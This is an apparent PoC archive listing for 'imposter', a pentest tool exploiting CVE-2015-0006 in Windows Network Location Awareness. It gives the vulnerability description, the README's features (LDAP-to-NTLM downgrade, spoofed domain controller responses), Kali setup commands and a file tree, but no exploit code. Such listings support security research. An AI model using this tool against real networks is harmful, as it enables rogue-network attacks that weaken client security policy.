Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-0006 PoC — Microsoft NLA安全功能规避漏洞

Source
https://github.com/bugch3ck/imposter
Associated Vulnerability
Title:Microsoft NLA安全功能规避漏洞 (CVE-2015-0006)
Description:The Network Location Awareness (NLA) service in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not perform mutual authentication to determine a domain connection, which allows remote attackers to trigger an unintended permissive configuration by spoofing DNS and LDAP responses on a local network, aka "NLA Security Feature Bypass Vulnerability."
Description
Proof of concept for CVE-2015-0006. Fixed in MS15-005 https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-005 .
Readme
# IMPOSTER

A pentest tool used to attack windows clients on rogue networks.

## Current version

###Features

* Downgrade LDAP to NTLM authentication
* Fake initial steps of an domain controller to fool Network Location Awareness

### Servers
DNS, CLDAP, LDAP

## Setup

The current version have been tested on Kali Linux but should on other operating systems as well.

### Dependencies

* pyasn1
* dnspython

### Quick setup on Kali Linux
Use the following steps to setup imposter on a Kali Linux machine.
```
git clone https://github.com/bugch3ck/imposter.git
cd imposter/src
git clone https://github.com/rthalley/dnspython.git
ln -s dnspython/dns dns
apt-get install pyasn1
```

## Changelog

### Version 0.1
Private release 2014-06-05. Implements DNS, CLDAP and LDAP. Can downgrade LDAP bind to use NTLM and fake successful authentication to trick Network Location Awareness to set the domain policy.
File Snapshot

 [4.0K]  /data/pocs/0f186a79892b480577370224b46c6d695a2565ab
├── [ 906]  README.md
└── [4.0K]  src
    ├── [1.8K]  imposter.py
    ├── [1.5K]  mscldap_server.py
    ├── [2.4K]  mscldap_utils.py
    ├── [2.1K]  msdns_server.py
    ├── [3.1K]  msldap_server.py
    ├── [2.5K]  msldap_utils.py
    ├── [4.0K]  ntlm.py
    ├── [4.0K]  proto
    │   ├── [  56]  cldap.py
    │   ├── [   0]  __init__.py
    │   ├── [  23]  ldap.py
    │   ├── [ 658]  rfc1798.py
    │   └── [ 22K]  rfc2251.py
    └── [ 112]  servers.py

2 directories, 14 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →